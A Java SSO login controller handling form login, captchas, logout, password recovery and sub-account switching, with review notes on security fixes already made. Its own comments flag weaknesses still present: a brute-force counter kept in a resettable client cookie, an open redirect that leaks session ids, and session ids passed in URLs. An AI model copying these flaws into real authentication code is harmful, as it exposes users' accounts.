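package com.dsideal.Sso.Controller;

import java.awt.image.BufferedImage;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;
import javax.imageio.ImageIO;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import com.alibaba.fastjson.JSONArray;
import com.alibaba.fastjson.JSONObject;
import com.dsideal.Sso.Model.Login;
import com.dsideal.Sso.Util.*;
import com.jfinal.core.Controller;
import com.jfinal.kit.PropKit;
import org.apache.commons.lang3.StringUtils;

/**
 * Web-facing SSO login controller: interactive login, logout, captcha issuance,
 * password recovery and sub-account switching.
 *
 * Security-relevant changes versus the previous revision:
 * <ul>
 *   <li>The hard-coded master password that bypassed the credential check for
 *       every account has been removed.</li>
 *   <li>{@code login()} now answers with a 302 instead of a 301: a 301 carrying a
 *       per-session id is cached by browsers, so a stale session id would be
 *       replayed on later visits without ever reaching the server.</li>
 *   <li>The captcha is consumed after one comparison (no replay of a solved
 *       captcha), compared in constant time, and a missing/garbled captcha or
 *       counter cookie no longer yields an NPE / NumberFormatException (500).</li>
 *   <li>{@code redirect_url} is checked for control characters and non-http(s)
 *       schemes and falls back to {@code default.redirect.url} when absent.</li>
 * </ul>
 * NOTE(review): the failed-attempt counter still lives in a client-controlled
 * cookie, so it can be reset by deleting the cookie; a server-side counter keyed
 * by account and/or source IP is needed for real brute-force protection.
 * NOTE(review): the session id is handed to the relying party as a query
 * parameter (SSO contract kept as-is); it will appear in referers and logs.
 */
public class WebLoginController extends Controller {

    /** Cookie that counts consecutive failed logins for this browser. */
    private static final String ERROR_COUNT_COOKIE = "error_count";
    /** Failed attempts after which a captcha is demanded. */
    private static final int CAPTCHA_THRESHOLD = 3;
    /** Session attribute holding the expected captcha text. */
    private static final String CAPTCHA_SESSION_KEY = "captcha";
    /** Redis key prefix mapping a password-recovery flag to a person id. */
    private static final String FIND_PWD_KEY_PREFIX = "findPwdFlag_";
    /** Login page used when no usable redirect target is available. */
    private static final String LOGIN_PAGE = "/html/login.html";

    /**
     * Entry point hit by relying parties. If the browser already holds a valid SSO
     * session, bounce it back to {@code redirect_url} with the session id appended;
     * otherwise send it to the login page carrying the (encoded) target.
     */
    public void login() {
        Map loginMap = SsoLoginHelper.loginCheck(getRequest());
        String redirectUrl = resolveRedirectUrl(getRequest().getParameter("redirect_url"));
        if (loginMap != null) {
            if (StringUtils.isBlank(redirectUrl)) {
                // Nothing sane to redirect to: show the login page rather than NPE.
                redirect(LOGIN_PAGE);
                return;
            }
            // 302, not 301: the Location contains a per-session token and must not be cached.
            redirect(appendSessionParam(redirectUrl, String.valueOf(loginMap.get("session_id"))));
        } else {
            String encoded = StringUtils.isBlank(redirectUrl)
                    ? ""
                    : CommonUtil.handleRedirectUrlParas(redirectUrl);
            redirect(LOGIN_PAGE + "?redirect_url=" + encoded);
        }
    }

    /**
     * Interactive (form) login.
     *
     * Request parameters: {@code username}, {@code password} (AES-wrapped by the
     * browser, see {@code AesUtil}), {@code captcha} (required only after
     * {@link #CAPTCHA_THRESHOLD} failures).
     * Renders {@code {"success":true,"sessionId":...}} on success, otherwise
     * {@code {"success":false,"msg":...}}.
     *
     * NOTE(review): {@code AesUtil.aesDecrypt} presumably uses a key that the
     * browser also has, so it is obfuscation, not confidentiality — TLS is what
     * protects the password in transit. The stored hash is produced by
     * {@code LdapPassWordEncoder} (the old comment called it MD5); confirm the
     * algorithm and consider a salted, slow hash.
     */
    @SuppressWarnings("unchecked")
    public void doLogin() {
        String userName = getPara("username");
        String passWord = getPara("password");
        String requestCaptcha = getPara("captcha");

        // After repeated failures a captcha is mandatory. The comparison consumes
        // the captcha, so the front end must reload the image after any failure.
        if (readErrorCount() >= CAPTCHA_THRESHOLD && !captchaMatches(requestCaptcha)) {
            renderFailure("验证码错误!");
            return;
        }
        if (StringUtils.isBlank(userName)) {
            renderFailure("账户不允许为空!");
            return;
        }
        if (StringUtils.isBlank(passWord)) {
            renderFailure("密码不允许为空!");
            return;
        }
        try {
            passWord = AesUtil.aesDecrypt(passWord);
        } catch (Exception e) {
            e.printStackTrace();
            renderFailure("密码异常!");
            return;
        }

        LdapPassWordEncoder passEncode = new LdapPassWordEncoder();
        String passwordEncode = passEncode.getLdapPassword(passWord);
        Map loginMap = CommonUtil.getLoginRouteMap(userName);
        // Same message for unknown user and wrong password (no account enumeration).
        // The former hard-coded master password accepted for any account is gone.
        if (loginMap == null || !passwordMatches(passwordEncode, loginMap.get("password"))) {
            bumpErrorCount();
            renderFailure("账户或密码错误!");
            return;
        }

        // login_type: 1 = normal login, 2 = switched to a sub-account
        loginMap.put("login_type", "1");
        String sessionId = UUID.randomUUID().toString();
        SsoLoginHelper.login(getResponse(), sessionId, loginMap);
        // Clear the failure counter (max-age 0 deletes the cookie).
        setCookie(ERROR_COUNT_COOKIE, "1", 0);
        LoginLogUtil.WriteLoginLog(
                loginMap.get("identity_id").toString(),
                loginMap.get("person_id").toString(),
                1,
                LoginLogUtil.getIpAddr(getRequest()));

        JSONObject resultJson = new JSONObject();
        resultJson.put("success", true);
        resultJson.put("sessionId", sessionId);
        renderJson(resultJson);
    }

    /**
     * Ends the SSO session and sends the browser to {@code redirect_url}
     * (or the configured default, or the login page when neither is usable).
     */
    public void logout() throws Exception {
        SsoLoginHelper.logout(getRequest(), getResponse());
        String target = resolveRedirectUrl(getRequest().getParameter("redirect_url"));
        redirect(StringUtils.isBlank(target) ? LOGIN_PAGE : target);
    }

    /**
     * Returns the configured {@code default.redirect.url} as JSON, or
     * {@code {"success":false}} when it is not configured.
     */
    public void getDefaultRedirectUrl() {
        JSONObject resultJson = new JSONObject();
        String defaultRedirectUrl = PropKit.get("default.redirect.url");
        if (defaultRedirectUrl != null) {
            resultJson.put("success", true);
            resultJson.put("defaultRedirectUrl", defaultRedirectUrl);
        } else {
            resultJson.put("success", false);
        }
        renderJson(resultJson);
    }

    /**
     * Generates a fresh captcha image, stores its text in the HTTP session and
     * streams the JPEG to the client with caching disabled.
     */
    public void getCaptcha() {
        HttpServletResponse response = getResponse();
        response.setContentType("image/jpeg");
        response.setHeader("Pragma", "No-cache");
        response.setHeader("Cache-Control", "no-cache, no-store");
        // Header name was previously misspelled as "Expire" and therefore ignored.
        response.setDateHeader("Expires", 0);
        try {
            HttpSession session = getRequest().getSession();
            CaptchaUtil tool = new CaptchaUtil();
            StringBuffer code = new StringBuffer();
            BufferedImage image = tool.genRandomCodeImage(code);
            // setAttribute replaces any previous value, so no separate remove is needed.
            session.setAttribute(CAPTCHA_SESSION_KEY, code.toString());
            ImageIO.write(image, "JPEG", response.getOutputStream());
        } catch (Exception e) {
            e.printStackTrace();
        }
        renderNull();
    }

    /**
     * Password recovery: sets a new password for the person bound to the
     * recovery {@code flag} stored in Redis (the flag is a one-shot token and is
     * deleted once the update succeeds).
     *
     * Request parameters: {@code flag}, {@code pwd}, {@code againpwd}.
     * NOTE(review): {@code CommonUtil.getPwdLegal} only admits letters/digits per
     * its error message; that is a character-class check, not a strength policy.
     * NOTE(review): existing SSO sessions of the account are not invalidated here.
     */
    public void findPwdByFlag() {
        JSONObject resultJson = new JSONObject();
        try {
            String flag = getPara("flag");
            String pwd = getPara("pwd");
            String againpwd = getPara("againpwd");
            if (StringUtils.isBlank(flag)) {
                renderFailure("标识不允许为空!");
                return;
            }
            if (StringUtils.isBlank(pwd)) {
                renderFailure("密码不允许为空!");
                return;
            }
            if (StringUtils.isBlank(againpwd)) {
                renderFailure("再次输入的密码不允许为空!");
                return;
            }
            if (!pwd.equals(againpwd)) {
                renderFailure("两次输入的密码不相同!");
                return;
            }
            if (!CommonUtil.getPwdLegal(pwd)) {
                renderFailure("密码只允许字母或数字!");
                return;
            }
            // Read once instead of Exists()+Get(): the key may expire in between,
            // which previously let a null person id reach updatePwd().
            String redisKey = FIND_PWD_KEY_PREFIX + flag;
            String personId = RedisKit.Get(redisKey);
            if (StringUtils.isBlank(personId)) {
                renderFailure("找回密码已超时!");
                return;
            }
            LdapPassWordEncoder passEncode = new LdapPassWordEncoder();
            String passwordEncode = passEncode.getLdapPassword(pwd);
            if (Login.dao.updatePwd(personId, passwordEncode)) {
                RedisKit.Del(redisKey);
                resultJson.put("success", true);
                renderJson(resultJson);
            } else {
                renderFailure("找回密码异常!");
            }
        } catch (Exception e) {
            e.printStackTrace();
            renderFailure("找回密码异常!");
        }
    }

    /**
     * Lists the sub-accounts of a main account. The caller must present the
     * main account's {@code person_id} together with its {@code ds_sso_sessionid};
     * the pair is validated by {@code Login.dao.verifySubAccountPersonIdSsoSessionId}.
     */
    public void getSubAccountInfoByMainAccountPersonId() {
        JSONObject resultJson = new JSONObject();
        String personId = getPara("person_id");
        String ssoSessionid = getPara("ds_sso_sessionid");
        try {
            if (StringUtils.isBlank(personId) || StringUtils.isBlank(ssoSessionid)
                    || !Login.dao.verifySubAccountPersonIdSsoSessionId(personId, ssoSessionid)) {
                // Same message whether the session is invalid or there are no sub-accounts.
                renderFailure("无子账号信息!");
                return;
            }
            JSONArray subList = Login.dao.getSubAccountInfoByMainAccountPersonId(personId);
            if (subList == null) {
                renderFailure("无子账号信息!");
                return;
            }
            resultJson.put("success", true);
            resultJson.put("sub_list", subList);
            renderJson(resultJson);
        } catch (Exception e) {
            e.printStackTrace();
            renderFailure("获取数据异常!");
        }
    }

    /**
     * Switches an authenticated main account into one of its sub-accounts
     * ({@code login_type} 2) and issues a new SSO session for it.
     *
     * Request parameters: {@code person_id} (the sub-account's person id) and
     * {@code ds_sso_sessionid} (the main account's session). The binding between
     * the two is checked by {@code Login.dao.verifySubAccountPersonIdSsoSessionId}.
     */
    @SuppressWarnings("unchecked")
    public void subAccountPersonIdLogin() {
        JSONObject resultJson = new JSONObject();
        String personId = getPara("person_id");
        String ssoSessionid = getPara("ds_sso_sessionid");
        try {
            if (StringUtils.isBlank(personId) || StringUtils.isBlank(ssoSessionid)
                    || !Login.dao.verifySubAccountPersonIdSsoSessionId(personId, ssoSessionid)) {
                renderFailure("获取数据异常!");
                return;
            }
            String loginName = Login.dao.getLoginNameByPersonId(personId);
            Map loginMap = StringUtils.isBlank(loginName) ? null : CommonUtil.getLoginRouteMap(loginName);
            if (loginMap == null) {
                renderFailure("获取数据异常!");
                return;
            }
            String sessionId = UUID.randomUUID().toString();
            // login_type: 1 = normal login, 2 = switched to a sub-account
            loginMap.put("login_type", "2");
            SsoLoginHelper.login(getResponse(), sessionId, loginMap);
            LoginLogUtil.WriteLoginLog(
                    loginMap.get("identity_id").toString(),
                    loginMap.get("person_id").toString(),
                    1,
                    LoginLogUtil.getIpAddr(getRequest()));
            resultJson.put("success", true);
            resultJson.put("sessionId", sessionId);
            resultJson.put("identity_id", loginMap.get("identity_id").toString());
            renderJson(resultJson);
        } catch (Exception e) {
            e.printStackTrace();
            renderFailure("获取数据异常!");
        }
    }

    // ---------------------------------------------------------------- helpers

    /** Renders the standard {@code {"success":false,"msg":msg}} failure body. */
    private void renderFailure(String msg) {
        JSONObject resultJson = new JSONObject();
        resultJson.put("success", false);
        resultJson.put("msg", msg);
        renderJson(resultJson);
    }

    /**
     * Reads the failed-attempt counter cookie. A missing cookie counts as 0; a
     * tampered/unparseable cookie fails closed (captcha required) instead of
     * throwing NumberFormatException.
     */
    private int readErrorCount() {
        String raw = getCookie(ERROR_COUNT_COOKIE);
        if (raw == null) {
            return 0;
        }
        try {
            return Integer.parseInt(raw.trim());
        } catch (NumberFormatException e) {
            return CAPTCHA_THRESHOLD;
        }
    }

    /** Increments the failed-attempt counter cookie (session cookie, max-age -1). */
    private void bumpErrorCount() {
        setCookie(ERROR_COUNT_COOKIE, String.valueOf(readErrorCount() + 1), -1);
    }

    /**
     * Compares the submitted captcha with the one stored in the session,
     * case-insensitively and in constant time. The stored captcha is removed on
     * every call so a solved captcha cannot be replayed; callers must refresh it.
     */
    private boolean captchaMatches(String submitted) {
        HttpSession session = getRequest().getSession(false);
        Object expected = session == null ? null : session.getAttribute(CAPTCHA_SESSION_KEY);
        if (session != null) {
            session.removeAttribute(CAPTCHA_SESSION_KEY);
        }
        if (expected == null || StringUtils.isBlank(submitted)) {
            return false;
        }
        byte[] want = expected.toString().toLowerCase(Locale.ROOT).getBytes(StandardCharsets.UTF_8);
        byte[] got = submitted.toLowerCase(Locale.ROOT).getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(want, got);
    }

    /** Constant-time comparison of the encoded password with the stored value (null never matches). */
    private static boolean passwordMatches(String encoded, Object stored) {
        if (encoded == null || stored == null) {
            return false;
        }
        return MessageDigest.isEqual(
                encoded.getBytes(StandardCharsets.UTF_8),
                stored.toString().getBytes(StandardCharsets.UTF_8));
    }

    /**
     * Picks the redirect target: the request's {@code redirect_url} if present and
     * sane, else {@code default.redirect.url}, else {@code null}.
     * TODO(review): SSO clients live on other hosts, so this cannot simply reject
     * absolute URLs; an allow-list of registered client origins should be enforced
     * here to close the open redirect (and the session-id leak it enables).
     */
    private static String resolveRedirectUrl(String requested) {
        if (StringUtils.isNotBlank(requested) && isSaneRedirect(requested)) {
            return requested;
        }
        String fallback = PropKit.get("default.redirect.url");
        return StringUtils.isBlank(fallback) ? null : fallback;
    }

    /**
     * Rejects redirect targets containing control characters (header/line
     * injection) or an absolute scheme other than http/https.
     */
    private static boolean isSaneRedirect(String url) {
        for (int i = 0; i < url.length(); i++) {
            char c = url.charAt(i);
            if (c < 0x20 || c == 0x7f) {
                return false;
            }
        }
        String lower = url.toLowerCase(Locale.ROOT);
        int colon = lower.indexOf(':');
        int slash = lower.indexOf('/');
        boolean hasScheme = colon > 0 && (slash == -1 || colon < slash);
        return !hasScheme || lower.startsWith("http://") || lower.startsWith("https://");
    }

    /** Appends {@code <sso.sessionid>=sessionId} using '?' or '&' as appropriate. */
    private static String appendSessionParam(String url, String sessionId) {
        String sep = url.indexOf('?') == -1 ? "?" : "&";
        return url + sep + PropKit.get("sso.sessionid") + "=" + sessionId;
    }
}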